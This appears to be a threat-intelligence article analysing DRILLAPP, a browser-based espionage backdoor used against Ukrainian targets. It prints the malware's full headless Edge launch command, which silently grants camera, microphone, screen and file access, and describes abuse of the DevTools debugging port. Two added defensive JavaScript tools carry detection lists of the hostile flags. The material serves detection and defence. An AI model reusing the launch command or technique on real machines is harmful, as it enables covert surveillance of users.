DRILLAPP: How Russia-Linked Hackers Turned Microsoft Edge Into a Surveillance Tool

A newly identified backdoor called DRILLAPP turns Microsoft Edge into a covert surveillance platform, silently capturing webcam footage, microphone audio, and screen recordings from infected machines without running a purpose-built malicious binary: the implant is JavaScript executed by the browser itself. Researchers have linked the campaign, observed throughout February 2026, with low confidence to the Russia-aligned threat actor known as Laundry Bear.

In March 2026, analysts at LAB52, the threat intelligence division of Spanish security firm S2 Grupo, published findings on a February 2026 campaign targeting Ukrainian organizations that had gone largely undetected. The operation delivered a JavaScript-based backdoor they named DRILLAPP, and it did something novel: rather than deploying a traditional malicious binary, it hijacked Microsoft Edge itself, running the browser in headless mode with command-line switches that disable its sandbox, its same-origin policy, and its camera, microphone, and screen-capture permission prompts. What emerged was a surveillance implant camouflaged inside one of the world's most commonly installed applications.

The discovery adds a new chapter to an already alarming story — a Russian-linked group that has spent over a year refining its approach to targeting Ukrainian defense personnel, government bodies, and civil society organizations through social engineering and custom malware.

The Threat Actor Behind DRILLAPP

DRILLAPP is attributed with low confidence to a threat group tracked under several names: Laundry Bear, UAC-0190, and Void Blizzard. The group is assessed to operate in support of Russian government interests and has been active since at least April 2024, according to Recorded Future's The Record. Its targets span government, defense, transportation, media, NGOs, and healthcare sectors across Europe and North America, with a particular focus on Ukraine.

The attribution to Laundry Bear is based on tactical overlaps with a campaign documented by Ukraine's Computer Emergency Response Team (CERT-UA) in January 2026. That operation, designated CERT-UA#19092, targeted members of the Ukrainian Armed Forces between October and December 2025 using a different malware family known as PLUGGYAPE. The connection between PLUGGYAPE and DRILLAPP is not a shared codebase — it is a shared playbook.

"Certain tactics shared with a Laundry Bear campaign reported by CERT-UA in January have been observed, resulting in the activity being attributed to this group with low confidence. These include the use of charity-themed lures or the hosting of operational artifacts on public text-sharing services." — LAB52, S2 Grupo (March 13, 2026)

The PLUGGYAPE campaign itself was notable. CERT-UA reported that attackers contacted Ukrainian servicemembers through Signal and WhatsApp, spoke Ukrainian, used Ukrainian phone numbers, and demonstrated detailed knowledge of their targets' organizations. Victims were directed to spoofed charity websites — some impersonating the Come Back Alive Foundation, a well-known Ukrainian humanitarian group — and prompted to download files disguised as documents. Those files were Python-based executables packaged with PyInstaller, ultimately installing the PLUGGYAPE backdoor, which communicated over WebSocket or MQTT.

The same charity lures, the same reliance on legitimate paste services for hosting payloads, and the same targeting profile now appear in the DRILLAPP campaign. The overlap is tactical rather than technical, so LAB52 links the two campaigns to the same actor only with low confidence.

How DRILLAPP Gets In: The Infection Chain

LAB52 identified two variants of the DRILLAPP campaign, separated by roughly three weeks and differentiated primarily by their initial delivery mechanism. Both share the same core execution logic and the same ultimate goal: establishing a persistent browser-based surveillance session on the victim's device.

DRILLAPP Attack Chain — First Variant
Stage 1: LNK lure file (CPL in the second variant)
Stage 2: HTA created in the temp folder; persistence via the Startup folder
Stage 3: Edge launched headless with debugging switches
Stage 4: JavaScript payload fetched from Pastefy
Stage 5: C2 over WebSocket; surveillance active
After the lure file runs, the DRILLAPP infection chain executes entirely inside the browser.

First Variant: LNK Files and Starlink Lures

The first variant, identified in early February 2026, begins with a Windows shortcut file — a .lnk file — that executes a command creating an HTML Application (.hta) in the system's temporary folder. Simultaneously, the LNK file copies itself to the Windows Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), establishing persistence so that the backdoor relaunches automatically after every reboot.

The victim is then shown a decoy webpage designed to look plausible. LAB52 observed two lure themes: imagery related to Starlink satellite internet installation — a technology critical to Ukrainian military communications — and content impersonating the Come Back Alive Foundation, a legitimate Ukrainian charity established in 2014 to support the Armed Forces. Both lures are carefully chosen to match the interests and daily concerns of Ukrainian defense and government personnel.

While the victim looks at the decoy content, the HTA file triggers Edge to open in headless mode — a state where the browser runs invisibly in the background with no visible window. The browser loads a remote JavaScript payload fetched from pastefy.app, a legitimate text-sharing service. The script is obfuscated using the open-source tool javascript-obfuscator, complicating static analysis.

Edge Debugging Parameters Used by DRILLAPP

The browser is launched with the following switches, each of which turns off a protection that is on by default: --no-sandbox (disables the renderer sandbox), --disable-web-security (disables the same-origin policy, so script on the page can read responses from any origin), --allow-file-access-from-files (lets a page loaded from file:// read other local files), --use-fake-ui-for-media-stream (accepts the camera and microphone permission prompt automatically), --auto-select-screen-capture-source=true (picks a capture source instead of showing the screen-share chooser), and --disable-user-media-security. Together these give page script access to the local file system and approve camera, microphone, and screen capture with no prompt and no user interaction, which is what lets the implant run in a headless window the user never sees.

Inside the Backdoor: Capabilities and C2 Architecture

Once the obfuscated payload loads inside the headless Edge instance, DRILLAPP functions as a lightweight but capable espionage tool. Through browser-native APIs — the same interfaces used by legitimate video conferencing and web applications — it gains access to the microphone for audio capture, the camera for video and still image capture, and the screen for screenshot or screen-recording collection. Files on the local file system are also accessible and transferable.

On first execution, the malware generates a unique device fingerprint. It does this using canvas fingerprinting — a technique originally developed for web analytics that renders a hidden HTML canvas element and reads back hardware-specific pixel rendering differences — combined with additional data points including screen resolution and system language. These values are hashed together and stored in the browser's persistent local storage under the key stream_client_id. This fingerprint identifies the victim machine across sessions without requiring a traditional cookie.

The malware then determines the victim's country by reading the system time zone. The code explicitly checks against a list of fifteen countries: the United Kingdom, Russia, Germany, France, China, Japan, the United States, Brazil, India, Ukraine, Canada, Australia, Italy, Spain, and Poland. If the time zone does not match any of those entries, the malware defaults to reporting the United States as the victim's location. This list reflects the geopolitical scope of Laundry Bear's intelligence interest — a set of NATO allies, adversary states, and Ukraine itself.

Command-and-control communications happen over WebSocket, a protocol used throughout legitimate web applications for real-time data exchange. This makes DRILLAPP traffic difficult to distinguish from normal browser activity on a network monitor. The WebSocket URL itself is not hardcoded into the payload; instead, the malware fetches it from a URL hosted on Pastefy — using the paste service as a dead drop resolver. If that URL is unavailable, the code falls back to localhost:8000, which LAB52 interprets as a debugging artifact left in place from the development phase.

"The browser is advantageous for this type of activity because it is a common and generally non-suspicious process, it offers extended capabilities accessible through debugging parameters that enable unsafe actions such as downloading remote files, and it provides legitimate access to sensitive resources such as the microphone, camera, or screen recording without triggering immediate alerts." — LAB52, S2 Grupo (March 13, 2026)

The Second Variant: Upgraded and Harder to Catch

A second version of DRILLAPP appeared in late February 2026. The initial delivery mechanism changed: LNK files were replaced by CPL files, Control Panel items that are ordinary DLLs loaded by control.exe (which hands them to rundll32.exe). CPL files are less commonly associated with malware delivery than LNK files, and execution through the Control Panel host process may evade endpoint rules tuned to catch shortcut-based loaders.

The decoy lures shifted as well. Where the first variant used Starlink imagery and charity content, the second variant displayed what appeared to be a weapons seizure report and an official-looking audit document from the Southern Office of the State Audit Service of Ukraine in the Mykolaiv region — loaded directly from the National Guard of Ukraine's official website. The sophistication of these lures suggests either reconnaissance of specific targets or a deliberate pivot toward government and audit personnel.

The backdoor payload itself received meaningful upgrades in this variant. Three new capabilities were added: recursive file listing (the ability to enumerate directory trees), batch file uploading (exfiltrating multiple files in a single operation), and arbitrary file downloading from the internet to the victim's device. That last capability required a workaround, because JavaScript running in a page cannot write a fetched file to a location of its choosing: a page can only trigger a download into the browser's configured download directory, subject to the browser's own prompts and policies.

To get around this, the operators used the Chrome DevTools Protocol (CDP). CDP is a debugging interface built into all Chromium-based browsers, including Edge, normally used by developers to inspect pages, debug JavaScript, and automate the browser during testing. It is exposed over a local TCP port when the browser is launched with --remote-debugging-port, which DRILLAPP's launch command includes (port 9222). The port is unauthenticated and, by default, listens on loopback, so any process on the host can drive the browser through it. Through CDP the malware can inject small scripts into the browser, change the download directory, and simulate the click that triggers a download from a remote server, so the file lands where the operator wants it. Because CDP commands arrive from outside the page, none of the restrictions that apply to page JavaScript constrain them.

msedge.exe --headless --no-sandbox --disable-web-security \
  --allow-file-access-from-files \
  --use-fake-ui-for-media-stream \
  --auto-select-screen-capture-source=true \
  --disable-user-media-security \
  --remote-debugging-port=9222
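A local check for the debugging endpoint described above, added here as an example and not taken from LAB52's report or from the malware: it queries the two HTTP discovery endpoints that every Chromium DevTools server exposes (/json/version, which includes the browser-level WebSocket URL needed for commands such as Browser.setDownloadBehavior, and /json/list, which enumerates open targets) and condenses them for an analyst. The port, the paste-host list and the sample responses are assumptions or constructed data, not observed artifacts.

```javascript
// Added example, not code from LAB52 or the DRILLAPP operators: a local
// audit for an exposed Chromium DevTools endpoint of the kind opened by
// --remote-debugging-port=9222. /json/version and /json/list are the
// protocol's documented HTTP discovery endpoints; the sample responses
// below are constructed to show the output shape.

const PASTE_HOSTS = new Set(["pastefy.app"]); // paste service named in the report

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Reduce the two discovery responses to what matters: whether a browser-level
// socket is exposed (the Browser domain is what a download-path change needs)
// and which pages are loaded, with paste-service hosts marked.
function summarize(version, targets) {
  const pages = (targets || [])
    .filter((t) => t.type === "page")
    .map((t) => {
      const host = hostOf(t.url);
      return { url: t.url, host, pasteService: PASTE_HOSTS.has(host) };
    });
  return {
    browser: version.Browser ?? "unknown",
    browserSocket: typeof version.webSocketDebuggerUrl === "string",
    pages,
    suspicious: pages.some((p) => p.pasteService),
  };
}

// Query a live endpoint. Anything but a clean answer (connection refused,
// timeout, no fetch in this runtime) is reported as "not open" rather than
// thrown, so the audit can be run blindly on a suspect host.
async function probe(host = "127.0.0.1", port = 9222, timeoutMs = 1500) {
  const get = async (path) => {
    const res = await fetch(`http://${host}:${port}${path}`, {
      signal: AbortSignal.timeout(timeoutMs),
    });
    if (!res.ok) throw new Error(`${path}: HTTP ${res.status}`);
    return res.json();
  };
  try {
    const [version, targets] = await Promise.all([get("/json/version"), get("/json/list")]);
    return { open: true, ...summarize(version, targets) };
  } catch (err) {
    return { open: false, error: String(err && err.message ? err.message : err) };
  }
}

// Constructed responses shaped like a headless Edge answering on 9222; the
// version string, GUID and page URL are placeholders.
const SAMPLE_VERSION = {
  Browser: "Edg/0.0.0.0",
  "Protocol-Version": "1.3",
  webSocketDebuggerUrl: "ws://127.0.0.1:9222/devtools/browser/00000000-0000-0000-0000-000000000000",
};
const SAMPLE_TARGETS = [
  { type: "page", id: "1", title: "", url: "https://pastefy.app/placeholder/raw",
    webSocketDebuggerUrl: "ws://127.0.0.1:9222/devtools/page/1" },
  { type: "background_page", id: "2", url: "chrome-extension://placeholder/background.html" },
];

console.log(JSON.stringify(summarize(SAMPLE_VERSION, SAMPLE_TARGETS), null, 2));
probe().then((r) => console.log("live probe of 127.0.0.1:9222:", r));
```

Run it with Node 18 or later on the suspect host. An `open: true` result with a browser-level socket and a page loaded from a paste host is what a DRILLAPP launch looks like from the inside; an open port on its own is not proof, since developer tooling opens 9222 as well, so correlate with the parent process of the browser.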

Why the Browser-as-Malware Approach Matters

DRILLAPP's browser-native execution model is not the first instance of malware abusing browser debugging capabilities, but it is among the clearest demonstrations of how completely a standard desktop browser can be transformed into a surveillance implant when its security parameters are disabled. The key insight the operators exploited is that endpoint detection tools are typically tuned to flag suspicious executables, unusual process behavior, or known malware signatures — not a browser process reading from a webcam.

An early proof-of-concept sample uploaded from Russia on January 28, 2026, offers a window into the development timeline. That sample ran the same infection chain but made no attempt to download a payload; instead, it contacted the benign website gnome.com. LAB52 assessed this as testing infrastructure connectivity before the actual campaign began — a standard practice in structured threat actor operations.

The use of Pastefy as a dead drop resolver further insulates the operation. Because Pastefy is a legitimate service, network-level blocks on the C2 WebSocket URL do not eliminate the attacker's ability to update the endpoint — they simply update the paste, and all infected machines retrieve the new address automatically. This architecture also means that even if a sample is analyzed in isolation, the actual C2 server address may not be visible at the time of analysis if the paste has been deleted or changed.

LAB52 researchers were candid about the current state of the tool: DRILLAPP is assessed to be in early development. The localhost:8000 fallback, the lack of full obfuscation in some areas of the code, and the relatively limited command set compared to mature implants all suggest an operator that is building and refining this capability in near-real time while actively deploying it against live targets.

"The analysis conducted indicates that DRILLAPP is a recent artifact that is still in an early stage of development. One of the most notable aspects is the use of the browser to deploy a backdoor, which suggests that the attackers are exploring new ways to evade detection." — LAB52, S2 Grupo (March 13, 2026)

That developmental trajectory is precisely what makes this campaign worth watching. A tool that already delivers camera access, microphone recording, screen capture, and file exfiltration, while hiding inside a trusted process, has significant room to grow before it approaches the ceiling of what browser-native execution can accomplish. System-wide keylogging is not a natural fit, since a headless instance only sees input sent to its own pages, but credential harvesting from the browser's own profile data (reachable once local file access is granted) and additional C2 channels over browser-native APIs such as WebRTC are well within reach.

Indicators of Compromise

LAB52 published a full set of indicators with their March 13, 2026 report. Key network indicators include two IP addresses (80.89.224[.]13 and 188.137.228[.]162) and several Pastefy URLs used as payload hosts and dead drop resolvers. File-based indicators include SHA-256 hashes for both the first and second variant samples, as well as the DRILLAPP JavaScript payload itself. Organizations should ingest these indicators into their SIEM and threat intelligence platforms and search retrospectively: the IP addresses and Pastefy URLs against proxy, DNS and firewall logs, and the hashes against endpoint file and process-creation telemetry.

Defensive controls recommended by security researchers include monitoring for Edge or Chrome launched with --remote-debugging-port on the command line, alerting on browsers executing with --disable-web-security or --no-sandbox (both appear in legitimate test automation, so baseline developer hosts before alerting broadly), alerting when a browser is spawned by mshta.exe, control.exe or rundll32.exe, and restricting LNK and CPL file execution through Group Policy or endpoint protection rules. The CIS Microsoft Edge Benchmark provides a baseline for restricting developer tools and remote debugging in managed environments; the DeveloperToolsAvailability and RemoteDebuggingAllowed browser policies are the relevant settings.
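As an added example that is not part of the report or of this page's own material, the command-line checks above and the switch list from the "Edge Debugging Parameters" section turned into a scoring function over process-creation events. The events, the parent-process list and the severity thresholds are constructed or assumed; field names follow Sysmon Event ID 1 so the function can be pointed at exported events with little change.

```javascript
// Added example, not code from LAB52 or the DRILLAPP operators: scores
// browser process-creation events for the launch pattern described above.
// Field names follow Sysmon Event ID 1; the events below are constructed.

const RISKY_FLAGS = {
  "--remote-debugging-port": "Chrome DevTools Protocol reachable over TCP",
  "--no-sandbox": "renderer sandbox disabled",
  "--disable-web-security": "same-origin policy disabled",
  "--allow-file-access-from-files": "file:// pages may read local files",
  "--use-fake-ui-for-media-stream": "camera/microphone prompt auto-approved",
  "--auto-select-screen-capture-source": "screen-capture picker auto-selected",
  "--disable-user-media-security": "media-stream security checks disabled",
};
// With --headless, any of these means capture can happen with no visible UI.
const MEDIA_FLAGS = [
  "--use-fake-ui-for-media-stream",
  "--auto-select-screen-capture-source",
  "--disable-user-media-security",
];
const BROWSERS = new Set(["msedge.exe", "chrome.exe"]);
// Script hosts and the Control Panel loader (HTA in variant 1, CPL in
// variant 2) have no business spawning a debug-flagged browser.
const SUSPICIOUS_PARENTS = new Set([
  "mshta.exe", "control.exe", "rundll32.exe", "wscript.exe", "cscript.exe",
]);

function basename(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Flag names with values stripped: "--remote-debugging-port=9222" -> "--remote-debugging-port".
function flagNames(commandLine) {
  const names = new Set();
  for (const token of commandLine.match(/"[^"]*"|\S+/g) || []) {
    if (token.startsWith("--")) names.add(token.split("=")[0].toLowerCase());
  }
  return names;
}

// First http(s) URL on the command line, so the analyst sees what was loaded.
function loadedUrl(commandLine) {
  const m = commandLine.match(/https?:\/\/[^\s"]+/i);
  return m ? m[0] : null;
}

// null for uninteresting events; otherwise a finding with severity and reasons.
function assess(event) {
  const image = basename(event.Image);
  if (!BROWSERS.has(image)) return null;
  const flags = flagNames(event.CommandLine);
  const hits = Object.keys(RISKY_FLAGS).filter((f) => flags.has(f));
  if (hits.length === 0) return null;

  const reasons = hits.map((f) => `${f}: ${RISKY_FLAGS[f]}`);
  const parent = basename(event.ParentImage);
  // --no-sandbox alone shows up in test automation, so it only rates "low";
  // debugging or same-origin bypass is "medium"; silent capture or a
  // script-host parent is "high".
  let severity = "low";
  if (flags.has("--remote-debugging-port") || flags.has("--disable-web-security")) {
    severity = "medium";
  }
  if (flags.has("--headless") && MEDIA_FLAGS.some((f) => flags.has(f))) {
    severity = "high";
    reasons.push("--headless plus media auto-approval: invisible camera/mic/screen capture");
  }
  if (SUSPICIOUS_PARENTS.has(parent)) {
    severity = "high";
    reasons.push(`launched by ${parent}, a script or Control Panel host`);
  }
  return { image, parent, severity, url: loadedUrl(event.CommandLine), reasons };
}

function scan(events) {
  return events.map(assess).filter(Boolean);
}

// Constructed sample events. The first mirrors the switch set quoted in the
// report; its URL is a placeholder, not an observed indicator.
const EDGE = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe";
const CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe";
const SAMPLE_EVENTS = [
  { Image: EDGE, ParentImage: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: `"${EDGE}" --headless --no-sandbox --disable-web-security ` +
      "--allow-file-access-from-files --use-fake-ui-for-media-stream " +
      "--auto-select-screen-capture-source=true --disable-user-media-security " +
      "--remote-debugging-port=9222 https://pastefy.app/placeholder/raw" },
  { Image: CHROME, ParentImage: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: `"${CHROME}" --remote-debugging-port=9222 --user-data-dir=C:\\tmp\\p` },
  { Image: EDGE, ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: `"${EDGE}" --profile-directory=Default https://intranet.example` },
];

for (const f of scan(SAMPLE_EVENTS)) {
  console.log(`[${f.severity}] ${f.parent} -> ${f.image} ${f.url ?? ""}`);
  for (const r of f.reasons) console.log("    " + r);
}
```

The first sample event scores high on two independent grounds (headless capture and an mshta.exe parent), the developer's chrome.exe with only a debugging port scores medium, and the ordinary explorer.exe launch produces no finding; tune SUSPICIOUS_PARENTS and the thresholds to the environment before putting the logic into a SIEM rule.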

Key Takeaways

  1. The browser is the new loader: DRILLAPP demonstrates that a fully functional espionage implant can run entirely within a legitimate browser process, accessing the webcam, microphone, screen, and file system without deploying a standalone malicious executable. Endpoint detection that focuses only on binary execution will miss this class of threat.
  2. Laundry Bear is iterating rapidly: Two distinct DRILLAPP variants appeared within approximately three weeks, each with expanded capabilities and a changed delivery mechanism. The PLUGGYAPE campaign reported by CERT-UA in January 2026 showed the same pattern of fast iteration. Organizations in Ukraine, or allied with it, should treat this actor as operationally active and evolving.
  3. Legitimate services as infrastructure: Pastefy, a benign text-sharing platform, hosts both the JavaScript payload and the C2 endpoint resolver. This pattern — abusing trusted third-party services to evade network-layer detection — is a hallmark of modern state-aligned espionage operations and is unlikely to change.
  4. Social engineering remains the entry point: Charity lures, government document impersonation, and Starlink-themed content are all carefully chosen to match the concerns of Ukrainian defense and government personnel. No technical control substitutes for user awareness of these specific lure categories in the current threat environment.
  5. Attribution carries uncertainty: LAB52 assigns low confidence to the Laundry Bear attribution. The tactical overlaps are real, but they could reflect deliberate mimicry or shared tooling across groups. Defenders should treat the behavioral indicators — browser-based execution, Pastefy hosting, charity-themed lures — as detection priorities regardless of who is ultimately behind the keyboard.

DRILLAPP signals a broader shift in how sophisticated threat actors think about implant design. Browsers are everywhere, their processes are trusted, and their capabilities — when debugging constraints are removed — rival those of purpose-built malware. The Ukraine conflict has long served as a testing ground for Russian cyber operations before those techniques migrate to other theaters. Security teams protecting organizations outside Ukraine should study DRILLAPP now, not after the next variant appears on their network.

Sources: LAB52 / S2 Grupo — Primary Research Report (March 13, 2026) · The Hacker News (March 16, 2026) · Security Affairs (March 16, 2026) · The Record / Recorded Future (January 13, 2026) · CERT-UA Alert #19092 (January 2026)
